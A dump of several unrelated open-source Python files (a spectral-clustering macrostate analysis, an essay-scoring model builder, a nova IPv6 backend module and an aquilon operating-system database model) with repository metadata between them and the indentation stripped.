nodeInfoLevelSize = []
nodeInfoSet = []
nodeInfoFilter = []
levelIdx = []
adja = []
ci = []
csize = []
numCluster = []
for level in range (0, len(superLevelSet[0])):
index1= getIndexFromMatrix(superLevelSet[0][level])
data = (X[ix_(index1,index1)])
citmp, csizetmp, specVals, specVecs, specGaps, conduct, cluster_treeData, cluster_treeConduct, cluster_treeLeft, cluster_treeRight = spectralClustering(data,superLevelSet[1][level])
ci.append(np.copy(citmp))
csize.append(np.copy(csizetmp))
numCluster.append(len(csize[level]))
print "(OUTPUT) ", ("Level %d has %d macrostates out of %d microstates" % (level ,numCluster[level], data.shape[0]))
numGraphNodes = len(nodeInfoLevel)
for i in range (0,numCluster[level]):
new_node = i + numGraphNodes
if (i==0):
levelIdx.append(np.copy([new_node]))
else:
levelIdx[level] = concatenate((levelIdx[level],new_node), axis=None)
nodeInfoLevel.append(np.copy(level));
nodeInfoLevelSize.append(data.shape[0])
thisNodeIndex = where(ci[level]==i)
nodeInfoSet.append(np.copy(superLevelSet[0][level][thisNodeIndex]))
nodeInfoFilter.append(np.copy(level))
if(level > 0):
prevLvlIdx = levelIdx[level-1]
thisLvlIdx = levelIdx[level]
for i in range (0,len(prevLvlIdx)):
for j in range (0,len(thisLvlIdx)):
a = prevLvlIdx[i]
b = thisLvlIdx[j]
N_ab = len(intersect1d(getIndexFromMatrix(nodeInfoSet[a]),getIndexFromMatrix(nodeInfoSet[b])));
if (N_ab > 0):
adja.append(np.copy([a,b,N_ab]))
adjaArray = array2matrix(adja, len(nodeInfoLevel))
if (numLevels == 1):
adjaArray = zeros((len(nodeInfoLevel),len(nodeInfoLevel)),int)
print "(OUTPUT) ", ('SMapper done...')
return(adjaArray, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, ci, csize)
def array2matrix(arr, lenArra):
result = zeros((lenArra,lenArra),int)
for i in arr:
result[i[0]][i[1]]= i[2]
result[i[1]][i[0]]= i[2]
return (result)
def spectralClustering(X,k):
clusterSizeThreshold=0
n = X.shape[0];
eps = 1e-4
randSurf = 1e-1
MAXCLUSTER = min(50,n)
Y = csc_matrix(X + (eps*eye(n,n)) +(randSurf * ones((n,n), float)/n))
Y2 = zeros((n,n))
tmparray=[]
for j in Y.sum(axis=1):
tmparray.append(np.copy(j[0,0]))
Y2[diag_indices(n)]= tmparray
Y2 = csc_matrix(Y2)
sigma = 1+eps+randSurf
B = Y - sigma*Y2
sigma_solve = dsolve.splu(B)
Y2L = aslinearoperator(Y2)
# printDebug(MAXCLUSTER, "MAXCLUSTER")
printDebug(n, "N")
#SPARCE matrix solver HAVES SOME PROBLEM since can return eigenvalues = 0.0, maybe increment the number of cycles DASM#
if ((n-4) > MAXCLUSTER):
# specVals,specVecs = ARPACK_gen_eigs(Y2L.matvec, sigma_solve.solve, Y2L.shape[0], sigma, MAXCLUSTER-1, 'LM')
specVals,specVecs = eigs( Y, MAXCLUSTER-1, Y2, sigma, which='LM',maxiter=10000 )
printDebug(specVals,"Specvals1a")
else:
specVals,specVecs = scipy.linalg.eig(Y.todense(),Y2.todense())
specVals=real(specVals)
printDebug(specVals,"Specvals1b")
#END#
#NEXT temporary fix
# specVals,specVecs = scipy.linalg.eig(Y.todense(),Y2.todense())
# specVals=real(specVals)
#END fix
# #SORT EIGENVALUES AND EIGENVECTORS
tmpindsort = argsort(-specVals)
specVals = specVals[tmpindsort]
specVecs = specVecs[:, tmpindsort] # second axis !!
# if (n > MAXCLUSTER):
# specVals = specVals[:MAXCLUSTER]
# specVecs = specVecs[:, :MAXCLUSTER]
printDebug(specVals, "SpecvalsSortShort")
specGaps = -(abs(diff(specVals)))
numComponents = sum(specVals>1-(1e-10))
#TODO: add this DASM#
#if numComponents>1,
# cluster_tree{1}.left = 2;
# cluster_tree{1}.right = 3;
# for i=1:numComponents,
# mn = mean(abs(spectrum.vecs(:,i)));
# cluster_tree{i+1}.data = find(abs(spectrum.vecs(:,i))>=mn);
# cluster_tree{i+1}.left = 0;
# cluster_tree{i+1}.right = 0;
# id_complement = find(abs(spectrum.vecs(:,i))<mn);
# cluster_tree{i+1}.conduct = sum(sum(X(cluster_tree{i+1}.data,id_complement)))/sum(sum(X(cluster_tree{i+1}.data,cluster_tree{i+1}.data)));
# end
#end
#END TODO#
cluster_treeData=[]
cluster_treeData.append(range(0,n))
cluster_treeLeft = [0]
cluster_treeRight = [0]
cluster_treeConduct = [0]
printDebug(numComponents,"numComponents")
printDebug(k+1,"k+1")
for i in range (numComponents, k+1): #k is the number of components identified by Betty numbers
tree_size = len(cluster_treeData)
variation = zeros((tree_size))
for j in range (0, tree_size):
if ((cluster_treeLeft[j] == 0) and (cluster_treeRight[j] == 0)):
tmp = specVecs[cluster_treeData[j], i]
if (len(tmp) > 1):
variation[j] = (var(tmp)*len(tmp)/(len(tmp)-1));
else:
variation[j] = 0;
mx = variation.max(0)
ind = variation.argmax(0)
indices = cluster_treeData[ind]
printDebug(indices,"indices")
printDebug(len(indices),"lenindices")
nn = len(indices)
if (i==1):
Xsplit = csc_matrix(X[ix_(indices,indices)]+eps*eye(nn,nn)+randSurf*ones((nn,nn))/nn)
vecFiedler = specVecs[:,i]
else:
Xsplit = csc_matrix(X[ix_(indices,indices)]+eps*eye(nn,nn)+randSurf*ones((nn,nn))/nn)
Y2 = zeros((nn,nn))
tmparray=[]
for j in Xsplit.sum(axis=1):
tmparray.append(np.copy(j[0,0]))
Y2[diag_indices(nn)]= tmparray
Y2 = csc_matrix(Y2)
B = Xsplit - sigma*Y2
sigma_solve = dsolve.splu(B)
Y2L = aslinearoperator(Y2)
##TODO: maybe somethingWrongHere DASM##
if ((nn-4) > 20):
# splitVals,splitVecs = ARPACK_gen_eigs(Y2L.matvec, sigma_solve.solve, Y2L.shape[0], sigma, 3, 'LM')
splitVals,splitVecs = eigs( Xsplit, 3, Y2, sigma, which='LM',maxiter=10000 )
else:
splitVals,splitVecs = scipy.linalg.eig(Xsplit.todense(),Y2.todense())
splitVals=real(splitVals)
##END ToDo##
##SORT EIGENVALUES AND EIGENVECTORS##
tmpindsort = argsort(-splitVals)
splitVals = splitVals[tmpindsort]
splitVecs = splitVecs[:, tmpindsort] # second axis !!
if (nn > 3):
splitVals = splitVals[:3]
splitVecs = splitVecs[:, :3]
if (len(splitVecs[0]) > 1):
vecFiedler = splitVecs[:,1]
else:
vecFiedler = splitVecs
left_indices = (vecFiedler < vecFiedler.mean()).nonzero()[0]
right_indices = (vecFiedler >= vecFiedler.mean()).nonzero()[0]
if ((min(len(left_indices),len(right_indices))) > 0): #ARPACK needs matrix >=5 to get speigs
lind = tree_size + 1
rind = tree_size + 2
cluster_treeLeft[ind] = lind
cluster_treeRight[ind] = rind
indices = IntList2array(indices)
cluster_treeData.append(indices[left_indices])
cluster_treeData.append(indices[right_indices])
cluster_treeLeft.append(0)
cluster_treeRight.append(0)
cluster_treeLeft.append(0)
cluster_treeRight.append(0)
if (len(left_indices)==1):
left_indices = concatenate((left_indices[0], left_indices[0]), axis=None)
if (len(right_indices)==1):
right_indices = concatenate((right_indices[0], right_indices[0]), axis=None)
cut = Xsplit[ix_(left_indices,right_indices)].sum()
volume_left = Xsplit[ix_(left_indices,left_indices)].sum()
volume_right = Xsplit[ix_(right_indices,right_indices)].sum()
cluster_treeConduct.append(cut/min(volume_left,volume_right))
cluster_treeConduct.append(cut/min(volume_left,volume_right))
leaves = []
leaveSize = []
ci = zeros((n), int)
if ((clusterSizeThreshold > 0) and (clusterSizeThreshold < 1)):
clusterSizeThreshold = around(clusterSizeThreshold*n);
else:
clusterSizeThreshold = around(clusterSizeThreshold);
for i in range (0, len(cluster_treeData)):
if ((cluster_treeLeft[i] == 0) and (cluster_treeRight[i] == 0)):
if (len(leaves) == 0):
leaves = [i]
ci[cluster_treeData[i]] = 1
else:
leaves = concatenate((leaves,i), axis=None)
ci[cluster_treeData[i]] = len(leaves)
# print leaves #Funny that makes an extra cicle?
leaveSize = zeros((len(leaves)))
for i in range (0,len(leaves)):
leaveSize[i] = sum(ci == (i+1))
idd = (leaveSize >= clusterSizeThreshold).nonzero()[0]
csize = np.copy(leaveSize[idd])
ci = zeros((n),int)
conduct = zeros((len(idd)));
for i in range (0, len(idd)):
ci[cluster_treeData[leaves[idd[i]]]]=i
conduct[i] = cluster_treeConduct[leaves[idd[i]]]
return(ci, csize, specVals, specVecs, specGaps, conduct, cluster_treeData, cluster_treeConduct, cluster_treeLeft, cluster_treeRight)
def flowGrad(G, levelIdx, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter):
numLevel = len(levelIdx)
dG = triu(G);
y=[]
localMax = (where(dG.sum(axis=0)[0] == 0))[1].transpose()
dd = zeros((len(G)), int);
for i in range (0,len(localMax)):
dd[localMax[i]] = len(nodeInfoSet[localMax[i]]);
dG = dG + diag(dd)
dG_inf=dG^numLevel
for i in range (0,len(G)):
y.append(where(dG_inf[:,i] > 0))
dGdivsum = getIndexFromMatrix((1.0/dG.sum(axis=0)).transpose())
MarkovT = dG * diag(dGdivsum)
yLocalMax = localMax
yGradFlow = dG
yEquilibriumEQ = MarkovT**numLevel
print "(OUTPUT) ", ("Number of local maxima: %d" % len(localMax))
return(yLocalMax, yGradFlow, yEquilibriumEQ)
def optimumAssignment(X, cptEquilibriumEQ, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, maximumAssignIterations):
print "(OUTPUT) ", ("Finding Optimum Assignments")
numMicro = max(X.shape[0], X.shape[1])
numNode = len(nodeInfoSet)
MacroStates = (where(diag(cptEquilibriumEQ)==1)[0]).transpose()
numMacro = len(MacroStates)
if numMacro == 1:
print "(OUTPUT) ", ("SHC has found only one Macrostate! Noting to optimize...")
ci = ones((numMicro), int)
csize = numMicro
fassign = []
T = []
Qmax = 1
id_fuzzy = []
return(ci, csize, fassign, T, Qmax, id_fuzzy)
print "(OUTPUT) ", ("Optimum assignments Done...")
distEQ = cptEquilibriumEQ[MacroStates,:]
ci = zeros((numMicro), int);
id_macro = []
# deterministic assignment on basins of local maxima
for i in range (0, numMacro):
macroBasin = (where(distEQ[i,:] == 1)[1]).transpose()
for j in range (0, len(macroBasin)):
if (j==0):
id_macro.append(np.copy(nodeInfoSet[macroBasin[j]]))
id_macro[i] = union1d(getIndexFromMatrix(id_macro[i]),getIndexFromMatrix(id_macro[i]))
else:
id_macro[i] = union1d(id_macro[i],getIndexFromMatrix(nodeInfoSet[macroBasin[j]]))
ci[id_macro[i]] = i+1 #Take care that ci is +1 since it maps microstates numbers, 0 is for fussy
# fuzzy microstates on barrier
id_fuzzy = (where(ci==0))[0]
print "(OUTPUT) ", ("Number of barrier microstates: %d" % len(id_fuzzy))
# Construct new transition count matrix from X
T = eye((numMacro+len(id_fuzzy)), (numMacro+len(id_fuzzy)))
T = T.tolil()
Xdense = X.todense()
# for i in range (0, numMacro):
# row_id = where(ci==(i+1))
# for j in range (i, numMacro):
# # print i, j
# col_id = where(ci==(j+1))
# T[i,j] = X[row_id,col_id].sum()
# #print len(id_fuzzy)
# for j in range (1, len(id_fuzzy)):
# # print i, j
# tmpindx=array([id_fuzzy[j]])
# T[i,j+numMacro] = X[row_id,tmpindx].sum()
for i in range (0, numMacro):
row_id = where(ci==(i+1))[0]
for j in range (i, numMacro):
col_id = where(ci==(j+1))[0]
T[i,j] = Xdense[ix_(row_id,col_id)].sum()
#print len(id_fuzzy)
for j in range (1, len(id_fuzzy)):
tmpindx=array([id_fuzzy[j],id_fuzzy[j]])
T[i,j+numMacro] = Xdense[ix_(row_id,tmpindx)].sum()
T = T + (triu(T,1)).transpose()
T = T.todense()
# print "(OUTPUT) SLOW 1"
T[numMacro:(numMacro+len(id_fuzzy)),numMacro:(numMacro+len(id_fuzzy))] = Xdense[ix_(id_fuzzy,id_fuzzy)]
# print "(OUTPUT) SLOW 2"
d = T.sum(axis=1)
n = d.shape[0]
dd = zeros((n,n))
tmparray=[]
# print "(OUTPUT) SLOW 3"
for j in d:
tmparray.append(1.0/j[0,0])
dd[diag_indices(n)]= tmparray
# print "(OUTPUT) SLOW 4"
# dd = lil_matrix((n,n))
# jj=0
# for j in (d):
# if (j[0,0] > 0):
# dd[jj,jj]=(1.0/j[0,0])
# else:
# dd[jj,jj]= 0 #Is this correct? Why this could happen?
# jj+=1
dd = csc_matrix(dd)
T = csc_matrix(T)
# print "(OUTPUT) SLOW 5"
M = T*dd
# print "(OUTPUT) SLOW 6"
Mp = M.todense()
# print "(OUTPUT) SLOW 7"
# print Mp.sum()
eps = 1e-4 # small for tie-breaker
fass = zeros((numMacro, (numMacro+len(id_fuzzy))))
# print "(OUTPUT) SLOW 8"
for i in range(0, numMacro):
# print "(OUTPUT) SLOW 8a", i
fass[i][i]=1
# print "(OUTPUT) SLOW 9"
fass[:,numMacro:] = Mp[:numMacro,numMacro:]
iterN = 0
fassign=[]
id_domore=[]
CI=[]
CSIZ=[]
Q=[]
fassign.append(copy(fass))
fass_sort = -fass
id_fass_sort = fass_sort.argsort(axis=0)
fass_sort.sort(axis=0)
fass_sort= -fass_sort
id_domore.append((where ((fass_sort[0,:] < eps) | ((fass_sort[0,:]-fass_sort[1,:])<eps)))[0])
print "(OUTPUT) ", ("Number of empty assignments: %d" % len(id_domore[iterN]));
CI.append(copy(ci))
CI[iterN][id_fuzzy] = 1+(id_fass_sort[0,numMacro:])
CSIZ.append(hiscMacro(CI[iterN]))
Q.append(metastability(X,CI[iterN]))
numMacro = ci.max(0)
print "(OUTPUT) ", ("Num of macrostates: %d" % ci.max(0))
print "(OUTPUT) ", ("Metastability (Q) = %.3f (%2.2f%%)" % (Q[iterN], (Q[iterN]/numMacro*100)))
Qmax = Q[iterN]
iter_max = iterN
ci = np.copy(CI[iterN])
csize = np.copy(CSIZ[iterN])
fassigne =[]
while ((id_domore[iterN].size>0) and (iterN < maximumAssignIterations)):
iterN = iterN + 1
print "(OUTPUT) ", ("*Iteration %d" % iterN)
numMacro = ci.max(0)
print "(OUTPUT) ", ("Number of macrostates: %d" % ci.max(0))
Mp = Mp*M
fass[:,id_domore[iterN-1]] = Mp[:numMacro,id_domore[iterN-1]]
fass_sort = -fass
id_fass_sort = fass_sort.argsort(axis=0)
fass_sort.sort(axis=0)
fass_sort= -fass_sort
id_domore.append((where ((fass_sort[0,:] < eps) | ((fass_sort[0,:]-fass_sort[1,:])<eps)))[0])
print "(OUTPUT) ", ("Number of empty assignment: %d" % len(id_domore[iterN]));
# Method I (first-reach diffusion): find the optimal assignment
CI.append(copy(ci))
CI[iterN][id_fuzzy] = 1+(id_fass_sort[0,numMacro:])
CSIZ.append(hiscMacro(CI[iterN]))
Q.append(metastability(X,CI[iterN]))
print "(OUTPUT) ", ("(Q) I (first-reach) = \t%.3f (%2.2f%%)" % (Q[iterN], (Q[iterN]/numMacro*100)));
# print Qmax, Q[iterN]
if (Qmax < Q[iterN]):
Qmax = Q[iterN]
iter_max = iterN
ci = np.copy(CI[iterN])
csize = np.copy(CSIZ[iterN])
# print ci
# Method II (all-iteration diffusion): rearrange the fuzzy assignment by the last iteration of Mp
numMacro = ci.max(0)
print "(OUTPUT) ", ("Number of macrostates: %d" % ci.max(0))
fassign.append(copy(fass)) #Copy the array to avoid creating a pointer (THX Raymond)
fassign[iterN][:,numMacro:] = Mp[:numMacro,numMacro:]
fassign[iterN][:,id_domore[iterN]] = (ones((numMacro,len(id_domore[iterN])))/numMacro);
F_rowsort = -fassign[iterN]
id_rowsort = F_rowsort.argsort(axis=0)
F_rowsort.sort(axis=0)
F_rowsort = -F_rowsort
CI[iterN][id_fuzzy] = id_rowsort[0,numMacro:]
CSIZ[iterN]=hiscMacro(CI[iterN])
Q[iterN] = metastability(X,CI[iterN])
print "(OUTPUT) ", ("(Q) II (all-iteration) = \t%.3f (%2.2f%%)" % (Q[iterN], (Q[iterN]/numMacro*100)));
if (Qmax < Q[iterN]):
Qmax = Q[iterN]
iter_max = iterN
ci = np.copy(CI[iterN])
csize = np.copy(CSIZ[iterN])
# print ci
print "(OUTPUT) ", ("---- Maximal metastability reached at iteration %d: %f (%2.2f%%) ----\n" % (iter_max,Qmax,(Qmax/numMacro*100)))
print "(OUTPUT) ", ("---- Final number of macrostates: %d ----\n" % ci.max(0))
print "(OUTPUT) ", ("Optimum assignments Done...")
return(ci, csize, fassign, T, Qmax, id_fuzzy)
def metastability(X,ci):
#Compute the metastability according to macro-clustering ci
numMacro=max(ci);
idX=[]
for i in range(0,numMacro):
idX.append(where(ci==(i+1))[0])
if (len (idX[i]) == 1):
idX[i] = [idX[i][0],idX[i][0]]
QQ = zeros((numMacro,numMacro))
for i in range(0,numMacro):
for j in range(0,numMacro):
QQ[i,j]=(X[ix_(idX[i],idX[j])].sum())
QQ[j,i]=QQ[i,j]
D = QQ.sum(axis=1)
Q = (diag(diag(1./D)*QQ)).sum()
return(Q)
def hiscMacro(arr): #Wrapper to Emulate matlab's --hisc-- function that counts the number of elements per class in a histogram
hisc=zeros((max(arr)), int)
for i in (arr):
hisc[i-1]+=1
return (hisc)
def writeFlowGraph(cptGradFlow, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, superLevels, outFlowGraphName, pLevels):
print "(OUTPUT) ", ("---- Generating Macrostate flowgraph ---")
# print "(DEBUG) ", scipy.linalg.norm(cptGradFlow - (cptGradFlow.conj().T))
if ( scipy.linalg.norm(cptGradFlow - (cptGradFlow.conj().T))==0 ):
print "(OUTPUT) ", ("error: Input graph is UNDIRECTED! I CANNOT GENERATE THE FLOW GRAPHIC!")
return
numNodes = max(shape(cptGradFlow))
colorParam=[]
sizeParam=[]
for i in range(len(nodeInfoLevel)):
colorParam.append(len(superLevels[1]) - nodeInfoFilter[i] - 1 )
sizeParam.append(100.0*len(nodeInfoSet[i])/nodeInfoLevelSize[i])
# printDebug(sizeParam, "sizeParam")
maxColorParam=max(colorParam)
colorScaleORI = arange(0.0,1.1,0.1)
colorScaleNEW = arange(0.3,.91,0.06)
print colorScaleORI, colorScaleNEW
colorInterpolator = interp1d(colorScaleORI,colorScaleNEW)
for i in range(numNodes):
colorParam[i]= colorInterpolator(float(colorParam[i])/maxColorParam)
# printDebug(colorParam, "colorParam")
sParam = np.copy(sizeParam)
levelColor = []
cm = get_cmap('jet')
for i in range(numNodes):
tmpColor=cm(colorParam[i]) # color will now be an RGBA tuple, THX internet
levelColor.append([int(tmpColor[0]*255),int(tmpColor[1]*255),int(tmpColor[2]*255),int(tmpColor[3]*255)])
for i in range(len(sizeParam)):
sizeParam[i] = 0.1 + sizeParam[i]/max(sizeParam)
outline = 'digraph "G" {\n'
for i in range(numNodes):
outline += ' node%d [label="%d:%2.0f%%", color="#%02x%02x%02x%02x",style=filled, shape=circle, width=%0.2f];\n' % (i, i, sParam[i], levelColor[i][0],levelColor[i][1],levelColor[i][2],levelColor[i][3], sizeParam[i])
# printDebug(cptGradFlow, "cptGradFlow")
for i in range(numNodes):
connNodes = where(cptGradFlow[:,i] > 0)[0]
for j in range(size(connNodes)):
outline += ' node%d -> node%d [label="%d"];\n' % (i, connNodes[0, j],cptGradFlow[connNodes[0,j],i])
levelSizes=[]
for i in range(len(superLevels[1])):
levelSizes.append(len(superLevels[0][i]))
levelSizeInfo = ""
for i in levelSizes:
levelSizeInfo += '%d; ' % i;
l=zeros((len(levelIdx)), int)
for i in range (len(levelIdx)):
l[i] = len(levelIdx[i])
l_end = l.cumsum(axis=0)
tmpNextLevIdxInfo=0
levelIdxInfo=""
for i in range(0,len(l_end)-1):
levelIdxInfo += "%d-%d; " % (tmpNextLevIdxInfo, l_end[i]-1)
tmpNextLevIdxInfo=l_end[i]
levelIdxInfo += "%d-%d; " % (tmpNextLevIdxInfo, l_end[len(l_end)-1])
levelDesity=""
for i in pLevels:
levelDesity += "%2.0f%%; " % (i*100.0)
outline += ' label = " Levels: %d \\l Density Levels: %s \\l Level Sizes: %s \\l Node Index: %s \\l\n' % (len(superLevels[1]), levelDesity, levelSizeInfo, levelIdxInfo)
outline += ' labelloc="b";\nlabeljust="l";\n'
outline += ' center = 1;\n overlap=scale;\n'
outline +='}'
print "(OUTPUT) ", ("Writting Macrostate flowgraph to: %s" % outFlowGraphName)
f = open(outFlowGraphName,'w')
print >>f, outline
f.close()
print "(OUTPUT) ", ("Macrostate flowgraph generated")
return
def printDebug(obj, message):
outline= ("(DEBUG) %s: " % message)
try:
for i in obj:
outline += ", " + str(i)
except TypeError:
outline += " " + str(obj)
print outline.replace("\n", " ")
if __name__ == '__main__':
main()
| apache-2.0 | -28,220,316,076,639,290 | 36.912297 | 229 | 0.655434 | false |
edx/ease | ease/model_creator.py | 1 | 7903 | #Provides interface functions to create and save models
import numpy
import re
import nltk
import sys
from sklearn.feature_extraction.text import CountVectorizer
import pickle
import os
import sklearn.ensemble
from itertools import chain
base_path = os.path.dirname(__file__)
sys.path.append(base_path)
from .essay_set import EssaySet
from . import util_functions
from . import feature_extractor
import logging
from . import predictor_extractor
log=logging.getLogger()
def read_in_test_data(filename):
"""
Reads in test data file found at filename.
filename must be a tab delimited file with columns id, dummy number column, score, dummy score, text
returns the score and the text
"""
tid, e_set, score, score2, text = [], [], [], [], []
combined_raw = open(filename).read()
raw_lines = combined_raw.splitlines()
for row in range(1, len(raw_lines)):
tid1, set1, score1, score12, text1 = raw_lines[row].strip().split("\t")
tid.append(int(tid1))
text.append(text1)
e_set.append(int(set1))
score.append(int(score1))
score2.append(int(score12))
return score, text
def read_in_test_prompt(filename):
"""
Reads in the prompt from a text file
Returns string
"""
prompt_string = open(filename).read()
return prompt_string
def read_in_test_data_twocolumn(filename,sep=","):
"""
Reads in a two column version of the test data.
Filename must point to a delimited file.
In filename, the first column should be integer score data.
The second column should be string text data.
Sep specifies the type of separator between fields.
"""
score, text = [], []
combined_raw = open(filename).read()
raw_lines = combined_raw.splitlines()
for row in range(1, len(raw_lines)):
score1, text1 = raw_lines[row].strip().split("\t")
text.append(text1)
score.append(int(score1))
return score, text
def create_essay_set(text, score, prompt_string, generate_additional=True):
"""
Creates an essay set from given data.
Text should be a list of strings corresponding to essay text.
Score should be a list of scores where score[n] corresponds to text[n]
Prompt string is just a string containing the essay prompt.
Generate_additional indicates whether to generate additional essays at the minimum score point or not.
"""
x = EssaySet()
for i in range(0, len(text)):
x.add_essay(text[i], score[i])
if score[i] == min(score) and generate_additional == True:
x.generate_additional_essays(x._clean_text[len(x._clean_text) - 1], score[i])
x.update_prompt(prompt_string)
return x
def get_cv_error(clf,feats,scores):
"""
Gets cross validated error for a given classifier, set of features, and scores
clf - classifier
feats - features to feed into the classified and cross validate over
scores - scores associated with the features -- feature row 1 associates with score 1, etc.
"""
results={'success' : False, 'kappa' : 0, 'mae' : 0}
try:
cv_preds=util_functions.gen_cv_preds(clf,feats,scores)
err=numpy.mean(numpy.abs(numpy.array(cv_preds)-scores))
kappa=util_functions.quadratic_weighted_kappa(list(cv_preds),scores)
results['mae']=err
results['kappa']=kappa
results['success']=True
except ValueError as ex:
# If this is hit, everything is fine. It is hard to explain why the error occurs, but it isn't a big deal.
msg = u"Not enough classes (0,1,etc) in each cross validation fold: {ex}".format(ex=ex)
log.debug(msg)
except:
log.exception("Error getting cv error estimates.")
return results
def get_algorithms(algorithm):
"""
Gets two classifiers for each type of algorithm, and returns them. First for predicting, second for cv error.
type - one of util_functions.AlgorithmTypes
"""
if algorithm == util_functions.AlgorithmTypes.classification:
clf = sklearn.ensemble.GradientBoostingClassifier(n_estimators=100, learning_rate=.05,
max_depth=4, random_state=1,min_samples_leaf=3)
clf2=sklearn.ensemble.GradientBoostingClassifier(n_estimators=100, learning_rate=.05,
max_depth=4, random_state=1,min_samples_leaf=3)
else:
clf = sklearn.ensemble.GradientBoostingRegressor(n_estimators=100, learning_rate=.05,
max_depth=4, random_state=1,min_samples_leaf=3)
clf2=sklearn.ensemble.GradientBoostingRegressor(n_estimators=100, learning_rate=.05,
max_depth=4, random_state=1,min_samples_leaf=3)
return clf, clf2
def extract_features_and_generate_model_predictors(predictor_set, algorithm=util_functions.AlgorithmTypes.regression):
"""
Extracts features and generates predictors based on a given predictor set
predictor_set - a PredictorSet object that has been initialized with data
type - one of util_functions.AlgorithmType
"""
if(algorithm not in [util_functions.AlgorithmTypes.regression, util_functions.AlgorithmTypes.classification]):
algorithm = util_functions.AlgorithmTypes.regression
f = predictor_extractor.PredictorExtractor()
f.initialize_dictionaries(predictor_set)
train_feats = f.gen_feats(predictor_set)
clf,clf2 = get_algorithms(algorithm)
cv_error_results=get_cv_error(clf2,train_feats,predictor_set._target)
try:
set_score = numpy.asarray(predictor_set._target, dtype=numpy.int)
clf.fit(train_feats, set_score)
except ValueError:
log.exception("Not enough classes (0,1,etc) in sample.")
set_score = predictor_set._target
set_score[0]=1
set_score[1]=0
clf.fit(train_feats, set_score)
return f, clf, cv_error_results
def extract_features_and_generate_model(essays, algorithm=util_functions.AlgorithmTypes.regression):
"""
Feed in an essay set to get feature vector and classifier
essays must be an essay set object
additional array is an optional argument that can specify
a numpy array of values to add in
returns a trained FeatureExtractor object and a trained classifier
"""
f = feature_extractor.FeatureExtractor()
f.initialize_dictionaries(essays)
train_feats = f.gen_feats(essays)
set_score = numpy.asarray(essays._score, dtype=numpy.int)
if len(util_functions.f7(list(set_score)))>5:
algorithm = util_functions.AlgorithmTypes.regression
else:
algorithm = util_functions.AlgorithmTypes.classification
clf,clf2 = get_algorithms(algorithm)
cv_error_results=get_cv_error(clf2,train_feats,essays._score)
try:
clf.fit(train_feats, set_score)
except ValueError:
log.exception("Not enough classes (0,1,etc) in sample.")
set_score[0]=1
set_score[1]=0
clf.fit(train_feats, set_score)
return f, clf, cv_error_results
def dump_model_to_file(prompt_string, feature_ext, classifier, text, score, model_path):
"""
Writes out a model to a file.
prompt string is a string containing the prompt
feature_ext is a trained FeatureExtractor object
classifier is a trained classifier
model_path is the path of write out the model file to
"""
model_file = {'prompt': prompt_string, 'extractor': feature_ext, 'model': classifier, 'text' : text, 'score' : score}
pickle.dump(model_file, file=open(model_path, "w"))
def create_essay_set_and_dump_model(text,score,prompt,model_path,additional_array=None):
"""
Function that creates essay set, extracts features, and writes out model
See above functions for argument descriptions
"""
essay_set=create_essay_set(text,score,prompt)
feature_ext,clf=extract_features_and_generate_model(essay_set,additional_array)
dump_model_to_file(prompt,feature_ext,clf,model_path)
| agpl-3.0 | 8,545,315,089,119,740,000 | 35.75814 | 121 | 0.690118 | false |
russellb/nova | nova/ipv6/api.py | 1 | 1342 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Openstack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import flags
from nova.openstack.common import cfg
from nova import utils
ipv6_backend_opt = cfg.StrOpt('ipv6_backend',
default='rfc2462',
help='Backend to use for IPv6 generation')
FLAGS = flags.FLAGS
FLAGS.register_opt(ipv6_backend_opt)
def reset_backend():
global IMPL
IMPL = utils.LazyPluggable('ipv6_backend',
rfc2462='nova.ipv6.rfc2462',
account_identifier='nova.ipv6.account_identifier')
def to_global(prefix, mac, project_id):
return IMPL.to_global(prefix, mac, project_id)
def to_mac(ipv6_address):
return IMPL.to_mac(ipv6_address)
reset_backend()
| apache-2.0 | 3,333,885,616,564,730,000 | 29.5 | 78 | 0.682563 | false |
guillaume-philippon/aquilon | lib/aquilon/aqdb/model/operating_system.py | 1 | 2257 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2009,2010,2011,2012,2013,2014,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Operating System as a high level cfg object """
from datetime import datetime
from sqlalchemy import (Column, Integer, DateTime, Sequence, String, ForeignKey,
UniqueConstraint)
from sqlalchemy.orm import relation, deferred
from aquilon.aqdb.model import Base, Archetype, AssetLifecycle
from aquilon.aqdb.column_types.aqstr import AqStr
_TN = 'operating_system'
class OperatingSystem(Base):
""" Operating Systems """
__tablename__ = _TN
_class_label = 'Operating System'
id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)
name = Column(AqStr(32), nullable=False)
version = Column(AqStr(16), nullable=False)
archetype_id = Column(ForeignKey(Archetype.id, ondelete="CASCADE"),
nullable=False)
creation_date = deferred(Column(DateTime, default=datetime.now,
nullable=False))
comments = Column(String(255), nullable=True)
lifecycle_id = Column(ForeignKey(AssetLifecycle.id), nullable=False)
archetype = relation(Archetype, lazy=False, innerjoin=True)
lifecycle = relation(AssetLifecycle, innerjoin=True)
__table_args__ = (UniqueConstraint(archetype_id, name, version),
{'info': {'unique_fields': ['name', 'version',
'archetype']}})
def __format__(self, format_spec):
instance = "%s/%s-%s" % (self.archetype.name, self.name, self.version)
return self.format_helper(format_spec, instance)
| apache-2.0 | -5,904,684,791,283,177,000 | 39.303571 | 80 | 0.673017 | false |
CaliOpen/CaliOpen | src/backend/tools/py.CLI/caliopen_cli/commands/dump_indexes_mappings.py | 1 | 1108 | import json
from caliopen_storage.helpers.json import JSONEncoder
